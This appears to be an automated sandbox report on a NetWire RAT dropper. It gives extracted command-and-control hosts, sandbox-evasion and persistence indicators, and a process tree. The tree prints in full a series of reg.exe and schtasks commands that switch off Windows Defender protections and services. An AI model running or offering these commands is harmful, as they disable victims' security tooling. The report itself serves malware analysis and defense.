Analysis
max time kernel: 131s
max time network: 135s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/04/2025, 01:09
Static task: static1
Behavioral task: behavioral1
Sample: 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
Resource: win10v2004-20250314-en
General
Target: 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
Size: 22.0MB
MD5: 2a26ed689a49e2b3cfd71901147f8303
SHA1: d49d9e9e8b0e10a4429a64dde1a0974bc414c819
SHA256: 00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
SHA512: 9dfd5314841394af05efbd2d8d995bea3921f83971472168a7bd0c789c94f95932fb117052caa8641ac902e1d942503edccb5536463a7fd65e8bdcb17d62e294
SSDEEP: 393216:XA/VQ0ppRcqLGEx1HEApai9u+5Snh5NQluiffTIS:XNYR8I2AblM5qgifUS
Malware Config
Extracted
Family: netwire
C2: maelus.mine.nu:3650, victoire.dyndns.biz:3650
activex_autorun: false
copy_executable: false
delete_original: false
host_id: first spread
keylogger_dir: %AppData%\Logs\
lock_executable: false
offline_keylogger: true
password: 0000
registry_autorun: false
use_mutex: false
Signatures
Modifies Windows Defender DisableAntiSpyware settings
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Modifies security service 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
NetWire RAT payload 6 IoCs
resource | yara_rule
behavioral1/memory/6108-292-0x0000000000400000-0x0000000000425000-memory.dmp | netwire
behavioral1/memory/3720-297-0x0000000000400000-0x0000000000425000-memory.dmp | netwire
behavioral1/memory/3720-295-0x0000000000400000-0x0000000000425000-memory.dmp | netwire
behavioral1/memory/4884-290-0x0000000000400000-0x0000000000425000-memory.dmp | netwire
behavioral1/memory/6108-288-0x0000000000400000-0x0000000000425000-memory.dmp | netwire
behavioral1/memory/4884-293-0x0000000000400000-0x0000000000425000-memory.dmp | netwire
Netwire family
Looks for VirtualBox Guest Additions in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | YrtbHB5Gfq2BVO9.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | ROJid3crwtijBOi.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | ZeXD3PhMCqyv9oV.exe
Looks for VMWare Tools registry key 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | YrtbHB5Gfq2BVO9.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | ROJid3crwtijBOi.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | ZeXD3PhMCqyv9oV.exe
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ZeXD3PhMCqyv9oV.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ROJid3crwtijBOi.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | YrtbHB5Gfq2BVO9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | YrtbHB5Gfq2BVO9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ROJid3crwtijBOi.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ZeXD3PhMCqyv9oV.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up the country code configured in the registry, most likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | ROJid3crwtijBOi.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | YrtbHB5Gfq2BVO9.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | ZeXD3PhMCqyv9oV.exe
Executes dropped EXE 9 IoCs
pid | Process
4004 | WinDriversQt.exe
4336 | ROJid3crwtijBOi.exe
1080 | YrtbHB5Gfq2BVO9.exe
4508 | ZeXD3PhMCqyv9oV.exe
4672 | nb662-full.exe
6108 | YrtbHB5Gfq2BVO9.exe
4884 | ROJid3crwtijBOi.exe
4420 | ZeXD3PhMCqyv9oV.exe
3720 | ZeXD3PhMCqyv9oV.exe
Loads dropped DLL 12 IoCs
pid | Process
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
4672 | nb662-full.exe
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | ZeXD3PhMCqyv9oV.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | ROJid3crwtijBOi.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | ROJid3crwtijBOi.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | YrtbHB5Gfq2BVO9.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | YrtbHB5Gfq2BVO9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | ZeXD3PhMCqyv9oV.exe
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | reg.exe
Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 1080 set thread context of 6108 | 1080 | YrtbHB5Gfq2BVO9.exe | 141
PID 4336 set thread context of 4884 | 4336 | ROJid3crwtijBOi.exe | 143
PID 4508 set thread context of 3720 | 4508 | ZeXD3PhMCqyv9oV.exe | 144
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ROJid3crwtijBOi.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WinDriversQt.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | nb662-full.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | YrtbHB5Gfq2BVO9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ZeXD3PhMCqyv9oV.exe
NSIS installer 2 IoCs
resource | yara_rule
behavioral1/files/0x00060000000227be-49.dat | nsis_installer_1
behavioral1/files/0x00060000000227be-49.dat | nsis_installer_2
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | nb662-full.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | nb662-full.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4692 | schtasks.exe
3408 | schtasks.exe
4792 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid | Process
4508 | ZeXD3PhMCqyv9oV.exe
4508 | ZeXD3PhMCqyv9oV.exe
1080 | YrtbHB5Gfq2BVO9.exe
4336 | ROJid3crwtijBOi.exe
4508 | ZeXD3PhMCqyv9oV.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4508 | ZeXD3PhMCqyv9oV.exe
Token: SeDebugPrivilege | 1080 | YrtbHB5Gfq2BVO9.exe
Token: SeDebugPrivilege | 4336 | ROJid3crwtijBOi.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
4004 | WinDriversQt.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2284 wrote to memory of 4004 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 87
PID 2284 wrote to memory of 4004 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 87
PID 2284 wrote to memory of 4004 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 87
PID 2284 wrote to memory of 4336 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 90
PID 2284 wrote to memory of 4336 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 90
PID 2284 wrote to memory of 4336 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 90
PID 2284 wrote to memory of 1080 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 91
PID 2284 wrote to memory of 1080 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 91
PID 2284 wrote to memory of 1080 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 91
PID 2284 wrote to memory of 4508 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 92
PID 2284 wrote to memory of 4508 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 92
PID 2284 wrote to memory of 4508 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 92
PID 4004 wrote to memory of 4684 | 4004 | WinDriversQt.exe | 94
PID 4004 wrote to memory of 4684 | 4004 | WinDriversQt.exe | 94
PID 2284 wrote to memory of 4672 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 93
PID 2284 wrote to memory of 4672 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 93
PID 2284 wrote to memory of 4672 | 2284 | 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | 93
PID 4684 wrote to memory of 4560 | 4684 | cmd.exe | 95
PID 4684 wrote to memory of 4560 | 4684 | cmd.exe | 95
PID 4684 wrote to memory of 4764 | 4684 | cmd.exe | 97
PID 4684 wrote to memory of 4764 | 4684 | cmd.exe | 97
PID 4684 wrote to memory of 1728 | 4684 | cmd.exe | 98
PID 4684 wrote to memory of 1728 | 4684 | cmd.exe | 98
PID 4684 wrote to memory of 3840 | 4684 | cmd.exe | 99
PID 4684 wrote to memory of 3840 | 4684 | cmd.exe | 99
PID 4684 wrote to memory of 1092 | 4684 | cmd.exe | 100
PID 4684 wrote to memory of 1092 | 4684 | cmd.exe | 100
PID 4684 wrote to memory of 6096 | 4684 | cmd.exe | 101
PID 4684 wrote to memory of 6096 | 4684 | cmd.exe | 101
PID 4684 wrote to memory of 5288 | 4684 | cmd.exe | 102
PID 4684 wrote to memory of 5288 | 4684 | cmd.exe | 102
PID 4684 wrote to memory of 4388 | 4684 | cmd.exe | 103
PID 4684 wrote to memory of 4388 | 4684 | cmd.exe | 103
PID 4684 wrote to memory of 6072 | 4684 | cmd.exe | 104
PID 4684 wrote to memory of 6072 | 4684 | cmd.exe | 104
PID 4684 wrote to memory of 536 | 4684 | cmd.exe | 105
PID 4684 wrote to memory of 536 | 4684 | cmd.exe | 105
PID 4684 wrote to memory of 1572 | 4684 | cmd.exe | 106
PID 4684 wrote to memory of 1572 | 4684 | cmd.exe | 106
PID 4684 wrote to memory of 1308 | 4684 | cmd.exe | 107
PID 4684 wrote to memory of 1308 | 4684 | cmd.exe | 107
PID 4684 wrote to memory of 4312 | 4684 | cmd.exe | 108
PID 4684 wrote to memory of 4312 | 4684 | cmd.exe | 108
PID 4684 wrote to memory of 5456 | 4684 | cmd.exe | 109
PID 4684 wrote to memory of 5456 | 4684 | cmd.exe | 109
PID 4684 wrote to memory of 1356 | 4684 | cmd.exe | 110
PID 4684 wrote to memory of 1356 | 4684 | cmd.exe | 110
PID 4684 wrote to memory of 5932 | 4684 | cmd.exe | 111
PID 4684 wrote to memory of 5932 | 4684 | cmd.exe | 111
PID 4684 wrote to memory of 4688 | 4684 | cmd.exe | 112
PID 4684 wrote to memory of 4688 | 4684 | cmd.exe | 112
PID 4684 wrote to memory of 5220 | 4684 | cmd.exe | 113
PID 4684 wrote to memory of 5220 | 4684 | cmd.exe | 113
PID 4684 wrote to memory of 728 | 4684 | cmd.exe | 114
PID 4684 wrote to memory of 728 | 4684 | cmd.exe | 114
PID 4684 wrote to memory of 3748 | 4684 | cmd.exe | 115
PID 4684 wrote to memory of 3748 | 4684 | cmd.exe | 115
PID 4684 wrote to memory of 944 | 4684 | cmd.exe | 116
PID 4684 wrote to memory of 944 | 4684 | cmd.exe | 116
PID 4684 wrote to memory of 3680 | 4684 | cmd.exe | 117
PID 4684 wrote to memory of 3680 | 4684 | cmd.exe | 117
PID 4684 wrote to memory of 5376 | 4684 | cmd.exe | 118
PID 4684 wrote to memory of 5376 | 4684 | cmd.exe | 118
PID 4684 wrote to memory of 3240 | 4684 | cmd.exe | 119
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe (depth 1, PID 2284)
    Command: "C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\WinDriversQt.exe (depth 2, PID 4004)
        Command: "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe (depth 3, PID 4684)
            Command: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\reg.exe (depth 4, PID 4560)
                Command: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

            C:\Windows\system32\reg.exe (depth 4, PID 4764)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                - Modifies Windows Defender DisableAntiSpyware settings

            C:\Windows\system32\reg.exe (depth 4, PID 1728)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

            C:\Windows\system32\reg.exe (depth 4, PID 3840)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

            C:\Windows\system32\reg.exe (depth 4, PID 1092)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                - Modifies Windows Defender Real-time Protection settings

            C:\Windows\system32\reg.exe (depth 4, PID 6096)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                - Modifies Windows Defender Real-time Protection settings

            C:\Windows\system32\reg.exe (depth 4, PID 5288)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                - Modifies Windows Defender Real-time Protection settings

            C:\Windows\system32\reg.exe (depth 4, PID 4388)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                - Modifies Windows Defender Real-time Protection settings

            C:\Windows\system32\reg.exe (depth 4, PID 6072)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                - Modifies Windows Defender Real-time Protection settings

            C:\Windows\system32\reg.exe (depth 4, PID 536)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

            C:\Windows\system32\reg.exe (depth 4, PID 1572)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

            C:\Windows\system32\reg.exe (depth 4, PID 1308)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

            C:\Windows\system32\reg.exe (depth 4, PID 4312)
                Command: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

            C:\Windows\system32\reg.exe (depth 4, PID 5456)
                Command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

            C:\Windows\system32\reg.exe (depth 4, PID 1356)
                Command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

            C:\Windows\system32\schtasks.exe (depth 4, PID 5932)
                Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

            C:\Windows\system32\schtasks.exe (depth 4, PID 4688)
                Command: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

            C:\Windows\system32\schtasks.exe (depth 4, PID 5220)
                Command: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

            C:\Windows\system32\schtasks.exe (depth 4, PID 728)
                Command: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

            C:\Windows\system32\schtasks.exe (depth 4, PID 3748)
                Command: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

            C:\Windows\system32\reg.exe (depth 4, PID 944)
                Command: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

            C:\Windows\system32\reg.exe (depth 4, PID 3680)
                Command: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

            C:\Windows\system32\reg.exe (depth 4, PID 5376)
                Command: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

            C:\Windows\system32\reg.exe (depth 4, PID 3240)
                Command: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

            C:\Windows\system32\reg.exe (depth 4, PID 2676)
                Command: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

            C:\Windows\system32\reg.exe (depth 4, PID 4880)
                Command: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                - Modifies Security services

            C:\Windows\system32\reg.exe (depth 4, PID 1192)
                Command: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                - Modifies Security services

            C:\Windows\system32\reg.exe (depth 4, PID 1496)
                Command: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                - Modifies Security services

            C:\Windows\system32\reg.exe (depth 4, PID 1648)
                Command: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                - Modifies Security services

            C:\Windows\system32\reg.exe (depth 4, PID 2880)
                Command: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                - Modifies security service

    C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe (depth 2, PID 4336)
        Command: "C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"
        - Looks for VirtualBox Guest Additions in registry
        - Looks for VMWare Tools registry key
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Maps connected drives based on registry
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 3408)
            Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"
            - System Location Discovery: System Language Discovery
            - Scheduled Task/Job: Scheduled Task

        C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe (depth 3, PID 4884)
            Command: "{path}"
            - Executes dropped EXE

    C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe (depth 2, PID 1080)
        Command: "C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"
        - Looks for VirtualBox Guest Additions in registry
        - Looks for VMWare Tools registry key
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Maps connected drives based on registry
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 4792)
            Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp"
            - System Location Discovery: System Language Discovery
            - Scheduled Task/Job: Scheduled Task

        C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe (depth 3, PID 6108)
            Command: "{path}"
            - Executes dropped EXE

    C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe (depth 2, PID 4508)
        Command: "C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"
        - Looks for VirtualBox Guest Additions in registry
        - Looks for VMWare Tools registry key
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Maps connected drives based on registry
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 4692)
            Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"
            - System Location Discovery: System Language Discovery
            - Scheduled Task/Job: Scheduled Task

        C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe (depth 3, PID 4420)
            Command: "{path}"
            - Executes dropped EXE

        C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe (depth 3, PID 3720)
            Command: "{path}"
            - Executes dropped EXE

    C:\Users\Admin\AppData\Roaming\nb662-full.exe (depth 2, PID 4672)
        Command: "C:\Users\Admin\AppData\Roaming\nb662-full.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Checks processor information in registry
Network
MITRE ATT&CK Enterprise v16
Persistence
    Create or Modify System Process (3)
        Windows Service (3)
    Scheduled Task/Job (1)
        Scheduled Task (1)
Privilege Escalation
    Create or Modify System Process (3)
        Windows Service (3)
    Scheduled Task/Job (1)
        Scheduled Task (1)
Defense Evasion
    Impair Defenses (3)
        Disable or Modify Tools (2)
    Modify Registry (4)
    Virtualization/Sandbox Evasion (2)
Downloads